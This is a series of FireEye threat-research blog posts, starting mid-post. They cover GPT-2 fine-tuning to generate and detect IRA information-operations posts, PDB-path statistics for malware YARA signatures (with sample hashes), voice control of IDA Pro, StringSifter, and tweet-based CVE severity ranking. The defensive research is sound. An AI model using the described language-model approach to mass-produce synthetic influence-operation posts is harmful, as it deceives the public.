Benign, English-language posts were gathered from verified social media accounts, which generally corresponded to public figures and other prominent individuals or organizations whose posts contained diverse, innocuous content. For the purposes of this blog post, information operations-related posts were obtained from the previously mentioned open source IRA datasets. For the classification task, we separated the IRA datasets that were previously combined for LM fine-tuning, and selected posts from only one of them for the group associated with CLS = 1. To perform dataset selection quantitatively, we fine-tuned LMs on each IRA dataset to produce three different LMs while keeping 33% of the posts from each dataset held out as test data. Doing so allowed us to quantify the overlap between the individual IRA datasets based on how well one dataset’s LM was able to predict post content originating from the other datasets.

Figure 4: Confusion matrix representing perplexities of the LMs on their test datasets. The LM corresponding to the GPT-2 row was not fine-tuned; it corresponds to the pretrained GPT-2 model with reported perplexity of 18.3 on its own test set, which was unavailable for evaluation using the LMs. The Reddit dataset was excluded due to the low volume of samples.

In Figure 4, we show the result of computing perplexity scores for each of the three LMs and the original pre-trained GPT-2 model on held out test data from each dataset. Lower scores indicate better perplexity, which captures the probability of the model choosing the correct next word. The lowest scores fell along the main diagonal of the perplexity confusion matrix, meaning that the fine-tuned LMs were best at predicting the next word on test data originating from within their own datasets. The LM fine-tuned on Twitter’s Elections Integrity dataset displayed the lowest perplexity scores when averaged across all held out test datasets, so we selected posts sampled from this dataset to demonstrate classification fine-tuning.

Figure 5: (A) Training loss histories during GPT-2 fine-tuning for the classification (red) and LM (grey, inset) tasks. (B) ROC curve (red) evaluated on the held out fine-tuning test set, contrasted with random guess (grey dotted).

To fine-tune for the classification task, we once again processed the selected dataset’s posts through the pre-trained GPT-2 model. This time, activations were fed through adjustable weights into two linear output layers instead of just the single one used for the language modeling task in the previous section. Here, fine-tuning was formulated as a multi-task objective with classification loss together with an auxiliary LM loss, which helped accelerate convergence during training and improved the generalization of the model. We also prepended posts with a new [BOS] (i.e. Beginning Of Sentence) string and suffixed posts with the previously mentioned [CLS] class label string, so that each post was fed into the model according to:

“[BOS]Kevin Mandia was on @CNBC’s @MadMoneyOnCNBC with @jimcramer discussing targeted disinformation heading into the… https://t.co/l2xKQJsuwk[CLS]”

The [BOS] string played a similar delimiting role to the <|endoftext|> string used previously in LM fine-tuning, and the [CLS] string encoded the hidden state ∈ {0, 1} that was the label fed to the model’s classification layer. The example social media post above came from the benign dataset, so this sample’s label was set to CLS = 0 during fine-tuning. Figure 5A shows the evolution of classification and auxiliary LM losses during fine-tuning, and Figure 5B displays the ROC curve for the fine-tuned classifier on its test set consisting of around 66,000 social media posts. The convergence of the losses to low values, together with a high Area Under the ROC Curve (i.e. AUC), illustrates that transfer learning allowed this model to accurately detect social media posts associated with IRA information operations activity versus benign ones. Taken together, these metrics indicate that the fine-tuned classifier should generalize well to newly ingested social media posts, providing analysts a capability they can use to separate signal from noise.

Conclusion

In this blog post, we demonstrated how to fine-tune a neural LM on open source datasets containing social media posts previously leveraged in information operations. Transfer learning allowed us to classify these posts with a high AUC score, and FireEye’s Threat Analysts can utilize this detection capability in order to discover and triage similar emergent operations. Additionally, we showed how Transformer models assign scores to different pieces of text via an attention mechanism. This visualization can be used by analysts to tease apart adversary tradecraft based on posts’ linguistic fingerprints and semantic stylings.

Transfer learning also allowed us to generate credible synthetic text with low perplexity scores. One of the barriers actors face when devising effective information operations is adequately capturing the nuances and context of the cultural climate in which their targets are situated. Our exercise here suggests this costly step could be bypassed using pre-trained LMs, whose generations can be fine-tuned to embody the zeitgeist of social media. GPT-2’s authors and subsequent researchers have warned about potential malicious use cases enabled by this powerful natural language generation technology, and while it was conducted here for a defensive application in a controlled offline setting using readily available open source data, our research reinforces this concern. As trends towards more powerful and readily available language generation models continue, it is important to redouble efforts towards detection as demonstrated by Figure 5 and other promising approaches such as Grover.

This research was conducted during a three-month FireEye IGNITE University Program summer internship, and represents a collaboration between the FDS and FireEye Threat Intelligence’s Information Operations Analysis teams. If you are interested in working on multidisciplinary projects at the intersection of cyber security and machine learning, please consider applying to one of our 2020 summer internships.

Definitive Dossier of Devilish Debug Details – Part Deux: A Didactic Deep Dive into Data Driven Deductions

Threat Research

Matt Berninger

17 October 2019 at 15:30

In Part One of this blog series, Steve Miller outlined what PDB paths are, how they appear in malware, how we use them to detect malicious files, and how we sometimes use them to make associations about groups and actors.

As Steve continued his research into PDB paths, we became interested in applying more general statistical analysis. The PDB path as an artifact poses an intriguing use case for a couple of reasons.

First, the PDB artifact is not directly tied to the functionality of the binary. As a byproduct of the compilation process, it contains information about the development environment, and by proxy, the malware author themselves. Rarely do we encounter static malware features with such an interesting tie to the human behind the keyboard, rather than the functionality of the file.

Second, file paths are an incredibly complex artifact with many different possible encodings. We had personally been dying to find an excuse to spend more time figuring out how to parse and encode paths in a more useful way. This presented an opportunity to dive into this space and test different approaches to representing file paths in various models.

The objectives of our project were:

Build a large data set of PDB paths and apply some statistical methods to find potentially new signature terms and logic.
Investigate whether applying machine learning classification approaches to this problem could improve our detection above writing hand-crafted signatures.
Build a PDB classifier as a weak signal for binary analysis.

To start, we began gathering data. Our dataset, pulled from internal and external sources, started with over 200,000 samples. Once we deduplicated by PDB path, we had around 50,000 samples. Next, we needed to consistently label these samples, so we considered various labeling schemes.

Labeling Binaries With PDB Paths

For many of the binaries we had internal FireEye labels, and for others we looked up hashes on VirusTotal (VT) to have a look at their detection rates. This covered the majority of our samples. For a relatively small subset we had disagreements between our internal engine and VT results, which merited a slightly more nuanced policy. The disagreement was most often that our internal assessment determined a file to be benign, but the VT results showed a nonzero percentage of vendors detecting the file as malicious. In these cases we plotted the ‘VT ratio”: that is, the percentage of vendors labeling the files as malicious (Figure 1).

Figure 1: Ratio of vendors calling file bad/total number of vendors

The vast majority of these samples had VT detection ratios below 0.3, and in those cases we labeled the binaries as benign. For the remainder of samples we tried two strategies – marking them all as malicious, or removing them from the training set entirely. Our classification performance did not change much between these two policies, so in the end we scrapped the remainder of the samples to reduce label noise.

Building Features

Next, we had to start building features. This is where the fun began. Looking at dozens and dozens of PDB paths, we simply started recording various things that ‘pop out’ to an analyst. As noted earlier, a file path contains tons of implicit information, beyond simply being a string-based artifact. Some analogies we have found useful is that a file path is more akin to a geographical location in its representation of a location on the file system, or like a sentence in that it reflects a series of dependent items.

To further illustrate this point, consider a simple file path such as:

C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb (source file)

This path tells us several things:

This software was compiled on the system drive of the computer
In a user profile, under user ‘World’
The project is managed on the Desktop, in a folder called ‘duck’
The filename has a high degree of entropy and is not very easy to remember

In contrast, consider something such as:

D:\VSCORE5\BUILD\VSCore\release\EntVUtil.pdb (source file)

This indicates:

Compilation on an external or secondary drive
Within a non-user directory
Contains development terms such as ‘BUILD’ and ‘release’
With a sensible, semi-memorable file name

These differences seem relatively straightforward and make intuitive sense as to why one might be representative of malware development whereas the other represents a more “legitimate-looking” development environment.

Feature Representations

How do we represent these differences to a model? The easiest and most obvious option is to calculate some statistics on each path. Features such as folder depth, path length, entropy, and counting things such as numbers, letters, and special characters in the PDB filename are easy to compute.

However, upon evaluation against our dataset, these features did not help to separate the classes very well. The following are some graphics detailing the distributions of these features between our classes of malicious and benign samples:

While there is potentially some separation between benign and malicious distributions, these features alone would likely not lead to an effective classifier (we tried). Additionally, we couldn’t easily translate these differences into explicit detection rules. There was more information in the paths that we needed to extract, so we began to look at how to encode the directory names themselves.

Normalization

As with any dataset, we had to undertake some steps to normalize the paths. For example, the occurrence of individual usernames, while perhaps interesting from an intelligence perspective, would be represented as distinct entities when in fact they have the same semantic meaning. Thus, we had to detect and replace usernames with <username> to normalize this representation. Other folder idiosyncrasies such as version numbers or randomly generated directories could similarly be normalized into <version> or <random>.

A typical normalized path might therefore go from this:

C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb

To this:

c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb

You may notice that the PDB filename itself was not normalized. In this case we wanted to derive features from the filename itself, so we left it. Other approaches could be to normalize it, or even to make note that the same filename string ‘mkzyu91952’ appears earlier in the path. There are endless possible features when dealing with file paths.

Directory Analysis

Once we had normalized directories, we could start to “tokenize” each directory term, to start performing some statistical analysis. Our main goal of this analysis was to see if there were any directory terms that highly corresponded to maliciousness, or see if there were any simple combinations, such as pairs or triplets, that exhibited similar behavior.

We did not find any single directory name that easily separated the classes. That would be too easy. However, we did find some general correlations with directories such as “Desktop” being somewhat more likely to be malicious, and use of shared drives such as Z: to be more indicative of a benign file. This makes intuitive sense given the more collaborative environment a “legitimate” software development process might require. There are, of course, many exceptions and this is what makes the problem tricky.

Another strong signal we found, at least in our dataset, is that when the word “Desktop” was in a non-English language and particularly in a different alphabet, the likelihood of that PDB path being tied to a malicious file was very high (Figure 2). While potentially useful, this can be indicative of geographical bias in our dataset, and further research would need to be done to see if this type of signature would generalize.

Figure 2: Unicode desktop folders from malicious samples

Various Tokenizing Schemes

In recording the directories of a file path, there are several ways you can represent the path. Let’s use this path to illustrate these different approaches:

c:\Leave\smell\Long\ruleThis.pdb (file)

Bag of Words

One very simple way is the “bag-of-words” approach, which simply treats the path as the distinct set of directory names it contains. Therefore, the aforementioned path would be represented as:

[‘c:’,’leave’,’smell’,’long’,’rulethis’]

Positional Analysis

Another approach we considered was recording the position of each directory name, as a distance from the drive. This retained more information about depth, such that a ‘build’ directory on the desktop would be treated differently than a ‘build’ directory nine directories further down. For this purpose, we excluded the drives since they would always have the same depth.

[’leave_1’,’smell_2’,’long_3’,’rulethis_4’]

N-Gram Analysis

Finally, we explored breaking paths into n-grams; that is, as a distinct set of n- adjacent directories. For example, a 2-gram representation of this path might look like:

[‘c:\leave’,’leave\smell’,’smell\long’,’long\rulethis’]

We tested each of these approaches and while positional analysis and n-grams contained more information, in the end, bag-of-words seemed to generalize best. Additionally, using the bag-of-words approach made it easier to extract simple signature logic from the resultant models, as will be shown in a later section.

Term Co-Occurrence

Since we had the bag-of-words vectors created for each path, we were also able to evaluate term co-occurrence across benign and malicious files. When we evaluated the co-occurrence of pairs of terms, we found some other interesting pairings that indeed paint two very different pictures of development environments (Figure 3).

Correlated with Malicious Files	Correlated with Benign Files
users, desktop	src, retail
documents, visual studio 2012	obj, x64
local, temporary projects	src, x86
users, projects	src, win32
users, documents	retail, dynamic
appdata, temporary projects	src, amd64
users, x86	src, x64

Figure 3: Correlated pairs with malicious and benign files

Keyword Lists

Our bag-of-words representation of the PDB paths then gave us a distinct set of nearly 70,000 distinct terms. The vast majority of these terms occurred once or twice in the entire dataset, resulting in what is known as a ‘long-tailed’ distribution. Figure 4 is a graph of only the top 100 most common terms in descending order.

Figure 4: Long tailed distribution of term occurrence

As you can see, the counts drop off quickly, and you are left dealing with an enormous amount of terms that may only appear a handful of times. One very simple way to solve this problem, without losing a ton of information, is to simply cut off a keyword list after a certain number of entries. For example, take the top 50 occurring folder names (across both good and bad files), and save them as a keyword list. Then match this list against every path in the dataset. To create features, one-hot encode each match.

Rather than arbitrarily setting a cutoff, we wanted to know a bit more about the distribution and understand where might be a good place to set a limit – such that we would cover enough of the samples without drastically increasing the number of features for our model. We therefore calculated the cumulative number of samples covered by each term, as we iterated down the list from most common to least common. Figure 5 is a graph showing the result.

Figure 5: Cumulative share of samples covered by distinct terms

As you can see, with only a small fraction of the terms, we can arrive at a significant percentage of the cumulative total PDB paths. Setting a simple cutoff at about 70% of the dataset resulted in roughly 230 terms for our total vocabulary. This gave us enough information about the dataset without blowing up our model with too many features (and therefore, dimensions). One-hot encoding the presence of these terms was then the final step in featurizing the directory names present in the paths.

YARA Signatures Do Grow on Trees

Armed with some statistical features, as well as one-hot encoded keyword matches, we began to train some models on our now-featurized dataset. In doing so, we hoped to use the model training and evaluation process to give us insights into how to build better signatures. If we developed an effective classification model, that would be an added benefit.

We felt that tree-based models made sense for this use case for two reasons. First, tree-based models have worked well in the past in domains requiring a certain amount of interpretability and using a blend of quantitative and categorical features. Second, the features we used are largely things we could represent in a YARA signature. Therefore, if our models built boolean logic branches that separated large numbers of PDB files, we could potentially translate these into signatures. This is not to say that other model families could not be used to build strong classifiers. Many other options ranging from Logistic Regression to Deep Learning could be considered.

We fed our featurized training set into a Decision Tree, having set a couple ‘hyperparameters’ such as max depth and minimum samples per leaf, etc. We were also able to use a sliding scale of these hyperparameters to dynamically create trees and, essentially, see what shook out. Examining a trained decision tree such as the one in Figure 6 allowed us to immediately build new signatures.

Figure 6: Example decision tree and decision paths

We found several other interesting tidbits within our decision trees. Some terms that resulted in completely or almost-completely malicious subgroups are:

Directory Term	Example Hashes
\poe\	a6b2aa2b489fb481c3cd9eab2f4f4f5c 92904dc99938352525492cd5133b9917 444be936b44cc6bd0cd5d0c88268fa77
\xampp\	4d093061c172b32bf8bef03ac44515ae 4e6c2d60873f644ef5e06a17d85ec777 52d2a08223d0b5cc300f067219021c90
\temporary projects\	a785bd1eb2a8495a93a2f348c9a8ca67 c43c79812d49ca0f3b4da5aca3745090 e540076f48d7069bacb6d607f2d389d9
\stub\	5ea538dfc64e28ad8c4063573a46800c adf27ce5e67d770321daf90be6f4d895 c6e23da146a6fa2956c3dd7a9314fc97

We also found the term ‘WindowsApplication1’ to be quite useful. 89% of the files in our dataset containing this directory were malicious. Cursory research indicates that this is the default directory generated when using Visual Studio to compile a Windows binary. Once again, this makes some intuitive sense for finding malware authors. Training and evaluating decision trees with various parameters turned out to be a hugely productive exercise in discovering potential new signature terms and logic.

Classification Accuracy and Findings

Since we now had a large dataset of PDB paths and features, we wanted to see if we could train a traditional classifier to separate good files from bad. Using a Random Forest with some tuning, we were able to achieve an average accuracy of 87% over 10 cross validations. However, while our recall (the percentage of bad things we could identify with the model) was relatively high at 89%, our malware precision (the share of those things we called bad that were actually bad) was far too low, hovering at or below 50%. This indicates that using this model alone for malware detection would result in an unacceptably large number of false positives, were we to deploy it in the wild as a singular detection platform. However, used in conjunction with other tools, this could be a useful weak signal to assist with analysis.

Conclusion and Next Steps

While our journey of statistical PDB analysis did not yield a magic malware classifier, it did yield a number of useful findings that we were hoping for:

We developed several file path feature functions which are transferable to other models under development.
By diving into statistical analysis of the dataset, we were able to identify new keywords and logic branches to include in YARA signatures. These signatures have since been deployed and discovered new malware samples.
We answered a number of our own general research questions about PDB paths, and were able to dispel some theories we had not fully tested with data.

While building an independent classifier was not the primary goal, improvements can surely be made to improve the end model accuracy. Generating an even larger, more diverse dataset would likely make the biggest impact on our accuracy, recall, and precision. Further hyperparameter tuning and feature engineering could also help. There is a large amount of established research into text classification using various deep learning methods such as LSTMs, which could be applied effectively to a larger dataset.

PDB paths are only one small family of file paths that we encounter in the field of cyber security. Whether in initial infection, staging, or another part of the attack lifecycle, the file paths found during forensic analysis can reveal incredibly useful information about adversary activity. We look forward to further community research on how to properly extract and represent that information.

IDA, I Think It’s Time You And I Had a Talk: Controlling IDA Pro With Voice Control Software

Threat Research

James T. Bennett

3 October 2019 at 17:00

Introduction

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing something quite unusual. It is not a tool or a virtual machine distribution, nor is it a plugin or script for a popular reverse engineering tool or framework. Rather, it is a profile created for a consumer software application completely unrelated to reverse engineering or malware analysis… until now. The software is named VoiceAttack, and its purpose is to make it easy for users to control other software on their computer using voice commands. With FLARE’s new profile for VoiceAttack, users can completely control IDA Pro with their voice! Have you ever dreamed of telling IDA Pro to decompile a function or show you the strings of a binary? Well dream no more! Not only does our profile give you total control of the software, it also provides shortcuts and other cool features not previously available. It’s our hope that providing voice control for the world’s most popular disassembler will further empower users with repetitive stress injuries or disabilities to more effectively put their reverse engineering skills to use with this new accessibility option as well as helping the community at large work more efficiently.

Check out our video demonstration of some of the features of the profile to see it in action.

How Does It Work?

Voice attack is an inexpensive software application that utilizes the Windows Speech Recognition (WSR) feature to enable the creation of user-defined, voice-activated macros. The user specifies a key word or phrase, then defines one or more actions to be taken when that word or phrase is recognized. The most common types of actions to be taken include key presses, mouse movement and clicks, and clipboard manipulation. However, there are many other more advanced features available that provide a lot of flexibility to users including variables, loops, and conditionals. You can even have the computer speak to you in response to your commands! VoiceAttack requires an internet connection, but only during the registration process, after which the network adapter can be disabled or configured to a network that cannot reach the internet without issue.

To use VoiceAttack, you must first train Windows Speech Recognition to recognize your voice. Instructions on how to do so can be found here. This process only takes a few minutes at minimum, but the more time you spend training, the better the experience you will have with it.

What Does the IDA Pro Profile Provide?

FLARE’s IDA Pro profile for VoiceAttack maps every advertised keyboard shortcut in IDA Pro to a voice command. Although this is only one part of what the profile provides, many users will find this in itself very useful. When developing this profile, I was shocked to discover just how many keyboard shortcuts there really are for IDA Pro and what can be accomplished with them. Some of my favorite shortcuts are found under the View->Open Subviews and Windows menus. With this profile, I can simply say “show strings” or “show structures” or “show window x” to change the tab I am currently viewing or open a new view in a tab without having to move my mouse cursor anywhere. The next few paragraphs describe some other useful commands to make any reverse engineer’s job easier. For a more detailed description of the profile and commands available, see the Github page.

Macros

A series of voice commands can perform multi-step actions not otherwise reachable by individual keyboard shortcuts. For example, wouldn’t it be nice to have commands to toggle the visibility of opcode bytes (see Figure 1)? Currently, you have to open the Options menu, select the General menu item, input a value in the Number of opcode bytes text field, and click the OK button. Well, now you can simply say “show opcodes” or “hide opcodes” and it will be so!

Figure 1: Configuring the number of opcode bytes to show in IDA Pro's disassembly view

Defining a Unicode string in IDA Pro is a multi-step exercise, whether you navigate to the Edit->Strings menu or use the “string literals” keyboard shortcut Alt+A followed by pressing the U key as shown in Figure 2. Now you can simply say “make Unicode string” and the work is done for you.

Figure 2: String literals dialog in IDA Pro

Reversing a C++ application? The Create struct from selection action is a very helpful feature in this case, but it requires you to navigate to the Edit->Structs menu in order to use it. The voice command “create struct from selection” does this for you automatically. The “look it up” command will copy the currently highlighted token in the disassembly and search Google for it using your default browser. There are several other macros in the profile that are like this and save you a lot of time navigating menus and dialogs to perform simple actions.

Cursor Movement, Dialogs, and Navigation

The cursor movement commands allow the user to move the cursor up, down, left, or right, one or more times, in specified increments. These commands also allow for scrolling with a voice command that commences scrolling in a chosen direction, and another voice command for stopping scrolling. There are even voice commands to set the speed of the scroll to slow, medium, or fast. In the disassembly view, the cursor can also be moved per “word” on the current line of the disassembly or decompilation, or even per basic block or function.

Like many other applications, dialogs are a part of IDA Pro’s user interface. The ability to easily navigate and interact with items in a dialog with your voice is essential to a smooth user experience. Voice commands in the profile enable the user to easily click the OK or Cancel buttons, toggle checkboxes, and tab through controls in the dialog in both directions and in specified increments.

With the aid of a companion IDAPython plugin, additional navigation commands are supported. Commands that allow the user to move the cursor to the beginning or end of the current function, to the next or previous “call” instruction, to the previous or next instruction containing the highlighted token, or to a specified number of bytes forward or backwards from the current cursor position help to make voice-controlled navigation easier.

These cursor movement and navigation commands enable users to have full control of IDA Pro without the use of their hands. While this is true and an important goal for the profile, it is not practical for people who have full use of their hands to go completely hands-free. The commands that navigate the cursor in IDA Pro will never be as fast or easy as simply using the mouse to point and click somewhere on the screen. In any case, users will find themselves building up a collection of voice commands they prefer to use that will depend on personal tastes. However, enabling full voice control allows reverse engineers who do not have full use of their hands to still effectively operate IDA Pro, which we hope will be of great use to the community. Having such a capability is also useful for those who suffer from repetitive strain injury.

Input Recognition

The commands described so far give you control over IDA Pro with your voice, but there is still the matter of providing textual input for items such as function and variable names, comments, and other text input fields. VoiceAttack does provide the ability in macros to enable and disable what is called “Dictation Mode”. When in Dictation Mode, any recognized words are added to a buffer of text until Dictation Mode is disabled. Then this text can be used elsewhere in the macro. Unfortunately, this feature is not designed to recognize the kinds of technical terms one would be using in the context of reverse engineering programs. Even if it were, there is still the issue of having to format the text to be a valid function or variable name. Instead of wrestling with this feature to try to make it work for this purpose, a very large and growing collection of “input recognition” commands was created. These commands are designed to recognize common words used in the names of functions and variables, as well as full function names as found in the C runtime libraries and the Windows APIs. Once recognized, the word or function name is copied to the user’s clipboard and pasted into the text field. To avoid the inadvertent triggering of such commands during the regular operation of IDA Pro, these commands are only active when the “input mode” is enabled. This mode is enabled automatically when certain commands are activated such as “rename” or “find”, and automatically disabled when dialog commands such as “OK” or “cancel” are activated. The input mode can also be manually manipulated with the “input mode on” and “input mode off” commands.

Conclusion

Today, the FLARE team is releasing a profile for VoiceAttack and a companion IDAPython plugin that enables full voice control of IDA Pro along with many added convenience features. The profile contains over 1000 defined commands and growing. It is easy to view, edit, and add commands to this profile to customize it to suit your needs or to improve it for the community at large. The VoiceAttack software is highly affordable and enables you to create profiles for any applications or games that you use. For installation instructions and usage information, see the project’s Github page. Give it a try today!

Open Sourcing StringSifter

Threat Research

Philip Tully

7 September 2019 at 17:00

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke analyst fatigue, relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.

Goals

StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.

Conclusion

We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities

Threat Research

Evan Wright

13 August 2019 at 16:45

Introduction

If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is s o m e risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerabilities Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring and broader expert consensus that can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue.

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to the release of a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, while the current process often hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2017 a massive number of vulnerable IoT devices were compromised leading to the largest Denial of Service (DoS) attack on the internet at the time.

Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.

Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated to CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if it contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they also are publicly available.

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods in natural language processing for extracting features from text: (1) N-grams features, and (2) Word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-gram or word triples for 3-grams. In other words, they are contiguous sequence of n words from a text. After we extract these n-grams, we can represent original text as a bag-of-ngrams. Consider the sentence:

A criticial vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.

Word embeddings are a way to learn the meaning of a word by how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings know the meaning of a word by the company it keeps, more formally known as the distribution hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train terminology specific to cyber security topics, such as related words to threats are defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier use these embeddings to implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.

Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER facilitates Windows 10 to be understood as an entity while October 2018 is treated as elements of a date. Without this ability, the text in Figure 3 may be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.

Figure 4: Tweet showing strong adjective use

Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers to output scores to predict relevancy and severity. When a named entity is identified all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer then a fully connected layer, to extract features from the tweets.

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably 1,000 tweets were held-out from the original 6,000 to be used for the relevancy classifier and 466 tweets were held-out for the severity classifier. To measure the performance, we use the Area Under the precision-recall Curve (AUC), which is a correctness score that summarizes the tradeoffs of minimizing the two types of errors (false positive vs false negative), with scores near 1 indicating better performance.

The relevancy classifier scored 0.85
The severity classifier using the CNN scored 0.65
The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

